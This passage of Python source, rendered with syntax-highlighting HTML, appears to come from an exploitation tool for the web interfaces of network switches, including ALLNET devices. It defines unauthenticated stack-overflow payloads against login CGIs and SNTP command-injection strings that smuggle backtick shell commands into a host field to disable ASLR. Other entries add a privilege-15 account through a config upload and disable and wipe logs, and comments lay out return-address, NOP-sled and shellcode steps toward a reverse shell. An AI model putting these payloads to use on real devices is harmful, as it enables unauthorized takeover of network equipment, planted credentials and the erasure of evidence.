						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_uploadfail'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span> <span class="token comment"># Not the real content, its the result of invalid firmware (workaround)</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'login.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/VUL.TXT'</span><span class="token punctuation">,</span> <span class="token comment"># We cannot control the content...</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">40</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;password='</span><span class="token operator">+</span> <span class="token string">'/'</span> <span class="token operator">*</span> <span class="token number">23</span> <span class="token operator">+</span><span class="token string">'/tmp/VUL.TXT&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'2'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_acctDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;timezone=0&amp;srvDef=ipv4&amp;srvHost=+&amp;port=0&amp;dlsType=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>	<span class="token comment"># Not vulnerable </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token comment">#'log_settings_set_cmd':'&amp;logState=1&amp;consoleState=1&amp;ramState=1&amp;fileState=1',	# Enable Logging CMD</span>
						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;empty=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=+&amp;port=139'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token comment">#'vulnerable': True,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'ALLNET'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'ALLNET GmbH Computersysteme'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.allnet.de/'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=4353'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=4352'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
